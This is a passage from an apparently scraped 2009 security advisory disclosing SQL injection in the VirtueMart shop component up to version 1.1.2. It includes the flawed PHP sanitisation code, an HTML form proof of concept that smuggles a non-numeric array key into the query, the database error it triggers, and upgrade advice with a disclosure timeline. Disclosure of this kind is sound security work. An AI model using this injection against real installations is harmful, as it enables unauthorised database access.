$i++ ) {\n$products[$i] = intval($products[$i]);\n...\n$db->query( 'SELECT `product_name` FROM `#__{vm}_product` WHERE `product_id`\nIN('.implode(',', $products).') ORDER BY `product_name`');\n----------------------------------------------------------------\n\nAt first glance it seems to be secure code because of "intval()".\nBut what happens in case of arrays with non-numeric indexes? Example:\n\nproduct_id[w] = waraxe\n\nTesting is possible via POST request, so special html file is needed:\n----------------------------------------------------------------\n<html><body><center>\n<form action="http://localhost/virtuemart112/administrator/index.php?\noption=com_virtuemart" method="post">\n<input type="hidden" name="pshop_mode" value="admin">\n<input type="hidden" name="page" value="product.product_move">\n<input type="hidden" name="product_id[w]" value="waraxe">\n<input type="submit" value="Test!">\n</form>\n</center></body></html>\n-----------------------------------------------------------------\n\nResulting error message (debugging is enabled):\n\nJDatabaseMySQL::query: 1054 - Unknown column 'waraxe' in 'where clause'\nSQL=SELECT `product_name` FROM `jos_vm_product` WHERE `product_id`\nIN(waraxe,0) ORDER BY `product_name`\n\n\nHow to fix:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nUpgrade to new version 1.1.3 ASAP\n\n\nDisclosure Timeline:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n11/27/08 Developer contacted\n11/27/08 Developer's initial response\n11/28/08 Fidings sent to developer\n01/22/09 Patched version 1.1.3 released by developer\n01/24/09 Public disclosure\n\nGreetings:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nGreets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,\nto all active waraxe.us forum members and to anyone else who know me!\n\n\nContact:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\ncome2waraxe@yahoo.com\nJanek Vind "waraxe"\n\nWaraxe forum: http://www.waraxe.us/forums.html\nPersonal homepage: http://www.janekvind.com/\n---------------------------------- [ EOF ] ---------------------------------\n\n# milw0rm.com [2009-03-31]\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-66411", "type": "seebug"}

virtuemart &lt;= 1.1.2 - Multiple Vulnerabilities

Description

No description provided by source.

virtuemart <= 1.1.2 - Multiple Vulnerabilities